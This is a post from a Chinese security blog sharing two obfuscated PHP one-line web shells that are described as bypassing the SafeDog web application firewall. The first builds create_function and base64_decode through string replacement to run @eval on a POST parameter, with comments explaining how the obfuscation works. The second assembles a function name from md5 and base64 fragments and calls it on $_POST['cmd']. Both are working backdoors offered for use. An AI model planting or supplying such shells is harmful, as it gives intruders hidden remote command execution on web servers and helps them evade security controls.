蜗蜗侠's Blog-关注网络安全移动版

主页 > 资源分享 >

php过狗一句话

分享一个别的地方看到的  混淆过狗php一句话

<?php
$mt="mFsKCleRfU";
$ojj="IEBleldle";
$hsa="E9TVFsnd2VuJ10p";
$fnx="Ow==";
$zk = str_replace("d","","sdtdrd_redpdldadcde");

//字符串替换:替换sdtdrd_redpdldadcde里的d为空  返回str_replace
$ef = $zk("z", "", "zbazsze64_zdzeczodze");          

//调用$zk 字符串替换:替换zbazsze64_zdzeczodze里的z为空  返回base64_decode
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn");

//调用$zk 字符串替换:替换pcprpepaptpe_fpupnpcptpipopn里的z为空   返回create_function创建匿名函数
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx)));
//$zvm=create_function(base64_decode(str_replace("le","","IEBleldlemFsKCleRfUE9TVFsnd2VuJ10pOw==")))
//$zvm=create_function(base64_decode(IEBldmFsKCRfUE9TVFsnd2VuJ10pOw==)))
//$zvm=create_function(@eval($_POST['wen']));
$zvm();  //执行
?>


2016年8月12日 12:08:22  更新

<?php
  $csawa=substr(hash("md5","woshiA", false),-5,1);
  $sgdas=substr(base64_decode("d29zaGlzYQ=="),-2,1);
  $sasds=substr(base64_decode("d29zaGlzYTI="),-3,1);
  $saswe=substr(hash("md5","woshie", false),-3,1);
  $udkar=substr(base64_decode("d29zaGly"),-1,1);
  $aefft=substr(base64_decode("d29zaGl0YWFz"),-4,1);
  $ckt=$csawa.$sgdas.$sasds.$saswe.$udkar.$aefft;
  $ckt($_POST['cmd']);
?>

(责任编辑:蜗蜗侠)